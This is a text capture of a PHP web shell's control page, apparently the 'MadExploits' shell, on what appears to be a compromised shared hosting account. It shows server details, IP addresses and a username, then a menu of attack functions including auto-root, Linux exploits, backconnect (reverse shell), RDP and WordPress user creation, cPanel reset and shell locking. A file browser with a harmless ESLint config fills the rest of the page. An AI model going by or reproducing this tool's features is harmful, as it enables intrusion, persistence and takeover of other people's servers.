Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
tui-dom /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
dr-xr-xr-x
src
[ DIR ]
dr-xr-xr-x
test
[ DIR ]
dr-xr-xr-x
.babelrc
296
B
-rw-r--r--
.eslintrc.js
1.2
KB
-rw-r--r--
.npmignore
357
B
-rw-r--r--
LICENSE
1.06
KB
-rw-r--r--
README.md
1.51
KB
-rw-r--r--
bower.json
496
B
-rw-r--r--
jsdoc.conf.json
734
B
-rw-r--r--
karma.conf.js
4.42
KB
-rw-r--r--
package.json
2.08
KB
-rw-r--r--
test.html
187
B
-rw-r--r--
webpack.config.js
1.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .eslintrc.js
module.exports = { "extends": "tui/es6", "parserOptions": { "sourceType": "module" }, "env": { "es6": true, "browser": true, "jasmine": true, "commonjs": true }, "globals": { "tui": true, "fixture": true }, "plugins": ["babel"], "rules": { "lines-around-directive": 0, "newline-before-return": 0, "sort-imports": "error", "no-useless-rename": "error", "no-duplicate-imports": ["error", { "includeExports": true }], "dot-notation": ["error", { "allowKeywords": true }], "prefer-destructuring": [ "error", { "VariableDeclarator": { "array": true, "object": true }, "AssignmentExpression": { "array": false, "object": false } }, { "enforceForRenamedProperties": false } ], "arrow-body-style": ["error", "as-needed", { "requireReturnForObjectLiteral": true }], "object-property-newline": ["error", { "allowMultiplePropertiesPerLine": true }] } };
Close